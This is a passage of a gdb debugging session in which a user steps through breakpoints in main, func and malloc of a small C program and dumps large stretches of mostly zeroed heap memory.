0x23de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23df0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23eb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ed0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ef0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x24000: Cannot access memory at address 0x24000
(gdb)
0x24004: Cannot access memory at address 0x24004
(gdb)
0x24008: Cannot access memory at address 0x24008
(gdb) c
Continuing.
Breakpoint 1, main (argc=2, argv=0xffbef054) at d.c:14
14 func();
(gdb) c
Continuing.
Breakpoint 2, func () at d.c:3
3 char *penis = malloc(300);
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) x/96x 0x22000
0x22000: 0x00000000 0x00000000 0x00000000 0x00000000
0x22010: 0x00000000 0x00000000 0x00000000 0x00000000
0x22020: 0x00000000 0x00000000 0x00000000 0x00000000
0x22030: 0x00000000 0x00000000 0x00000000 0x00000000
0x22040: 0x00000000 0x00000000 0x00000000 0x00000000
0x22050: 0x00000000 0x00000000 0x00000000 0x00000000
0x22060: 0x00000000 0x00000000 0x00000000 0x00000000
0x22070: 0x00000000 0x00000000 0x00000000 0x00000000
0x22080: 0x00000000 0x00000000 0x00000000 0x00000000
0x22090: 0x00000000 0x00000000 0x00000000 0x00000000
0x220a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22100: 0x00000000 0x00000000 0x00000000 0x00000000
0x22110: 0x00000000 0x00000000 0x00000000 0x00000000
0x22120: 0x00000000 0x00000000 0x00000000 0x00000000
0x22130: 0x00000000 0x00000000 0x00000000 0x00000000
0x22140: 0x00000000 0x00000000 0x00000000 0x00000000
0x22150: 0x00000000 0x00000000 0x00000000 0x00000000
0x22160: 0x00000000 0x00000000 0x00000000 0x00000000
0x22170: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22180: 0x00000000 0x00000000 0x00000000 0x00000000
0x22190: 0x00000000 0x00000000 0x00000000 0x00000000
0x221a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22200: 0x00000000 0x00000000 0x00000000 0x00000000
0x22210: 0x00000000 0x00000000 0x00000000 0x00000000
0x22220: 0x00000000 0x00000000 0x00000000 0x00000000
0x22230: 0x00000000 0x00000000 0x00000000 0x00000000
0x22240: 0x00000000 0x00000000 0x00000000 0x00000000
0x22250: 0x00000000 0x00000000 0x00000000 0x00000000
0x22260: 0x00000000 0x00000000 0x00000000 0x00000000
0x22270: 0x00000000 0x00000000 0x00000000 0x00000000
0x22280: 0x00000000 0x00000000 0x00000000 0x00000000
0x22290: 0x00000000 0x00000000 0x00000000 0x00000000
0x222a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22300: 0x00000000 0x00000000 0x00000000 0x00000000
0x22310: 0x00000000 0x00000000 0x00000000 0x00000000
0x22320: 0x00000000 0x00000000 0x00000000 0x00000000
0x22330: 0x00000000 0x00000000 0x00000000 0x00000000
0x22340: 0x00000000 0x00000000 0x00000000 0x00000000
0x22350: 0x00000000 0x00000000 0x00000000 0x00000000
0x22360: 0x00000000 0x00000000 0x00000000 0x00000000
0x22370: 0x00000000 0x00000000 0x00000000 0x00000000
0x22380: 0x00000000 0x00000000 0x00000000 0x00000000
0x22390: 0x00000000 0x00000000 0x00000000 0x00000000
0x223a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22400: 0x00000000 0x00000000 0x00000000 0x00000000
0x22410: 0x00000000 0x00000000 0x00000000 0x00000000
0x22420: 0x00000000 0x00000000 0x00000000 0x00000000
0x22430: 0x00000000 0x00000000 0x00000000 0x00000000
0x22440: 0x00000000 0x00000000 0x00000000 0x00000000
0x22450: 0x00000000 0x00000000 0x00000000 0x00000000
0x22460: 0x00000000 0x00000000 0x00000000 0x00000000
0x22470: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22480: 0x00000000 0x00000000 0x00000000 0x00000000
0x22490: 0x00000000 0x00000000 0x00000000 0x00000000
0x224a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22500: 0x00000000 0x00000000 0x00000000 0x00000000
0x22510: 0x00000000 0x00000000 0x00000000 0x00000000
0x22520: 0x00000000 0x00000000 0x00000000 0x00000000
0x22530: 0x00000000 0x00000000 0x00000000 0x00000000
0x22540: 0x00000000 0x00000000 0x00000000 0x00000000
0x22550: 0x00000000 0x00000000 0x00000000 0x00000000
0x22560: 0x00000000 0x00000000 0x00000000 0x00000000
0x22570: 0x00000000 0x00000000 0x00000000 0x00000000
0x22580: 0x00000000 0x00000000 0x00000000 0x00000000
0x22590: 0x00000000 0x00000000 0x00000000 0x00000000
0x225a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22600: 0x00000000 0x00000000 0x00000000 0x00000000
0x22610: 0x00000000 0x00000000 0x00000000 0x00000000
0x22620: 0x00000000 0x00000000 0x00000000 0x00000000
0x22630: 0x00000000 0x00000000 0x00000000 0x00000000
0x22640: 0x00000000 0x00000000 0x00000000 0x00000000
0x22650: 0x00000000 0x00000000 0x00000000 0x00000000
0x22660: 0x00000000 0x00000000 0x00000000 0x00000000
0x22670: 0x00000000 0x00000000 0x00000000 0x00000000
0x22680: 0x00000000 0x00000000 0x00000000 0x00000000
0x22690: 0x00000000 0x00000000 0x00000000 0x00000000
0x226a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22700: 0x00000000 0x00000000 0x00000000 0x00000000
0x22710: 0x00000000 0x00000000 0x00000000 0x00000000
0x22720: 0x00000000 0x00000000 0x00000000 0x00000000
0x22730: 0x00000000 0x00000000 0x00000000 0x00000000
0x22740: 0x00000000 0x00000000 0x00000000 0x00000000
0x22750: 0x00000000 0x00000000 0x00000000 0x00000000
0x22760: 0x00000000 0x00000000 0x00000000 0x00000000
0x22770: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22780: 0x00000000 0x00000000 0x00000000 0x00000000
0x22790: 0x00000000 0x00000000 0x00000000 0x00000000
0x227a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22800: 0x00000000 0x00000000 0x00000000 0x00000000
0x22810: 0x00000000 0x00000000 0x00000000 0x00000000
0x22820: 0x00000000 0x00000000 0x00000000 0x00000000
0x22830: 0x00000000 0x00000000 0x00000000 0x00000000
0x22840: 0x00000000 0x00000000 0x00000000 0x00000000
0x22850: 0x00000000 0x00000000 0x00000000 0x00000000
0x22860: 0x00000000 0x00000000 0x00000000 0x00000000
0x22870: 0x00000000 0x00000000 0x00000000 0x00000000
0x22880: 0x00000000 0x00000000 0x00000000 0x00000000
0x22890: 0x00000000 0x00000000 0x00000000 0x00000000
0x228a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22900: 0x00000000 0x00000000 0x00000000 0x00000000
0x22910: 0x00000000 0x00000000 0x00000000 0x00000000
0x22920: 0x00000000 0x00000000 0x00000000 0x00000000
0x22930: 0x00000000 0x00000000 0x00000000 0x00000000
0x22940: 0x00000000 0x00000000 0x00000000 0x00000000
0x22950: 0x00000000 0x00000000 0x00000000 0x00000000
0x22960: 0x00000000 0x00000000 0x00000000 0x00000000
0x22970: 0x00000000 0x00000000 0x00000000 0x00000000
0x22980: 0x00000000 0x00000000 0x00000000 0x00000000
0x22990: 0x00000000 0x00000000 0x00000000 0x00000000
0x229a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a20: 0x00000000 0x00000000 0x00020d60 0x00000000
0x22a30: 0x00000003 0x00000000 0x00000000 0x00000000
0x22a40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22a80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22aa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ad0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ae0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22af0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b70: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ba0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22bc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22be0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22bf0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22c00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c70: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22cb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ce0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22eb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ed0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ef0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22f00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f70: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23000: 0x00000000 0x00000000 0x00000000 0x00000000
0x23010: 0x00000000 0x00000000 0x00000000 0x00000000
0x23020: 0x00000000 0x00000000 0x00000000 0x00000000
0x23030: 0x00000000 0x00000000 0x00000000 0x00000000
0x23040: 0x00000000 0x00000000 0x00000000 0x00000000
0x23050: 0x00000000 0x00000000 0x00000000 0x00000000
0x23060: 0x00000000 0x00000000 0x00000000 0x00000000
0x23070: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23080: 0x00000000 0x00000000 0x00000000 0x00000000
0x23090: 0x00000000 0x00000000 0x00000000 0x00000000
0x230a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23100: 0x00000000 0x00000000 0x00000000 0x00000000
0x23110: 0x00000000 0x00000000 0x00000000 0x00000000
0x23120: 0x00000000 0x00000000 0x00000000 0x00000000
0x23130: 0x00000000 0x00000000 0x00000000 0x00000000
0x23140: 0x00000000 0x00000000 0x00000000 0x00000000
0x23150: 0x00000000 0x00000000 0x00000000 0x00000000
0x23160: 0x00000000 0x00000000 0x00000000 0x00000000
0x23170: 0x00000000 0x00000000 0x00000000 0x00000000
0x23180: 0x00000000 0x00000000 0x00000000 0x00000000
0x23190: 0x00000000 0x00000000 0x00000000 0x00000000
0x231a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23200: 0x00000000 0x00000000 0x00000000 0x00000000
0x23210: 0x00000000 0x00000000 0x00000000 0x00000000
0x23220: 0x00000000 0x00000000 0x00000000 0x00000000
0x23230: 0x00000000 0x00000000 0x00000000 0x00000000
0x23240: 0x00000000 0x00000000 0x00000000 0x00000000
0x23250: 0x00000000 0x00000000 0x00000000 0x00000000
0x23260: 0x00000000 0x00000000 0x00000000 0x00000000
0x23270: 0x00000000 0x00000000 0x00000000 0x00000000
0x23280: 0x00000000 0x00000000 0x00000000 0x00000000
0x23290: 0x00000000 0x00000000 0x00000000 0x00000000
0x232a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23300: 0x00000000 0x00000000 0x00000000 0x00000000
0x23310: 0x00000000 0x00000000 0x00000000 0x00000000
0x23320: 0x00000000 0x00000000 0x00000000 0x00000000
0x23330: 0x00000000 0x00000000 0x00000000 0x00000000
0x23340: 0x00000000 0x00000000 0x00000000 0x00000000
0x23350: 0x00000000 0x00000000 0x00000000 0x00000000
0x23360: 0x00000000 0x00000000 0x00000000 0x00000000
0x23370: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23380: 0x00000000 0x00000000 0x00000000 0x00000000
0x23390: 0x00000000 0x00000000 0x00000000 0x00000000
0x233a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23400: 0x00000000 0x00000000 0x00000000 0x00000000
0x23410: 0x00000000 0x00000000 0x00000000 0x00000000
0x23420: 0x00000000 0x00000000 0x00000000 0x00000000
0x23430: 0x00000000 0x00000000 0x00000000 0x00000000
0x23440: 0x00000000 0x00000000 0x00000000 0x00000000
0x23450: 0x00000000 0x00000000 0x00000000 0x00000000
0x23460: 0x00000000 0x00000000 0x00000000 0x00000000
0x23470: 0x00000000 0x00000000 0x00000000 0x00000000
0x23480: 0x00000000 0x00000000 0x00000000 0x00000000
0x23490: 0x00000000 0x00000000 0x00000000 0x00000000
0x234a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23500: 0x00000000 0x00000000 0x00000000 0x00000000
0x23510: 0x00000000 0x00000000 0x00000000 0x00000000
0x23520: 0x00000000 0x00000000 0x00000000 0x00000000
0x23530: 0x00000000 0x00000000 0x00000000 0x00000000
0x23540: 0x00000000 0x00000000 0x00000000 0x00000000
0x23550: 0x00000000 0x00000000 0x00000000 0x00000000
0x23560: 0x00000000 0x00000000 0x00000000 0x00000000
0x23570: 0x00000000 0x00000000 0x00000000 0x00000000
0x23580: 0x00000000 0x00000000 0x00000000 0x00000000
0x23590: 0x00000000 0x00000000 0x00000000 0x00000000
0x235a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23600: 0x00000000 0x00000000 0x00000000 0x00000000
0x23610: 0x00000000 0x00000000 0x00000000 0x00000000
0x23620: 0x00000000 0x00000000 0x00000000 0x00000000
0x23630: 0x00000000 0x00000000 0x00000000 0x00000000
0x23640: 0x00000000 0x00000000 0x00000000 0x00000000
0x23650: 0x00000000 0x00000000 0x00000000 0x00000000
0x23660: 0x00000000 0x00000000 0x00000000 0x00000000
0x23670: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23680: 0x00000000 0x00000000 0x00000000 0x00000000
0x23690: 0x00000000 0x00000000 0x00000000 0x00000000
0x236a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23700: 0x00000000 0x00000000 0x00000000 0x00000000
0x23710: 0x00000000 0x00000000 0x00000000 0x00000000
0x23720: 0x00000000 0x00000000 0x00000000 0x00000000
0x23730: 0x00000000 0x00000000 0x00000000 0x00000000
0x23740: 0x00000000 0x00000000 0x00000000 0x00000000
0x23750: 0x00000000 0x00000000 0x00000000 0x00000000
0x23760: 0x00000000 0x00000000 0x00000000 0x00000000
0x23770: 0x00000000 0x00000000 0x00000000 0x00000000
0x23780: 0x00000000 0x00000000 0x00000000 0x00000000
0x23790: 0x00000000 0x00000000 0x00000000 0x00000000
0x237a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23800: 0x00000000 0x00000000 0x00000000 0x00000000
0x23810: 0x00000000 0x00000000 0x00000000 0x00000000
0x23820: 0x00000000 0x00000000 0x00000000 0x00000000
0x23830: 0x00000000 0x00000000 0x00000000 0x00000000
0x23840: 0x00000000 0x00000000 0x00000000 0x00000000
0x23850: 0x00000000 0x00000000 0x00000000 0x00000000
0x23860: 0x00000000 0x00000000 0x00000000 0x00000000
0x23870: 0x00000000 0x00000000 0x00000000 0x00000000
0x23880: 0x00000000 0x00000000 0x00000000 0x00000000
0x23890: 0x00000000 0x00000000 0x00000000 0x00000000
0x238a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23900: 0x00000000 0x00000000 0x00000000 0x00000000
0x23910: 0x00000000 0x00000000 0x00000000 0x00000000
0x23920: 0x00000000 0x00000000 0x00000000 0x00000000
0x23930: 0x00000000 0x00000000 0x00000000 0x00000000
0x23940: 0x00000000 0x00000000 0x00000000 0x00000000
0x23950: 0x00000000 0x00000000 0x00000000 0x00000000
0x23960: 0x00000000 0x00000000 0x00000000 0x00000000
0x23970: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23980: 0x00000000 0x00000000 0x00000000 0x00000000
0x23990: 0x00000000 0x00000000 0x00000000 0x00000000
0x239a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23aa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ad0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ae0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23af0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23b00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ba0: 0x00000000 0x00000000 0x00000000 0x00000000
